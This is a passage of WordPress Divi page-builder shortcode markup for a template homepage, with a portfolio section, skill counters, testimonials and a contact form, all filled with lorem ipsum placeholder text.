button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" 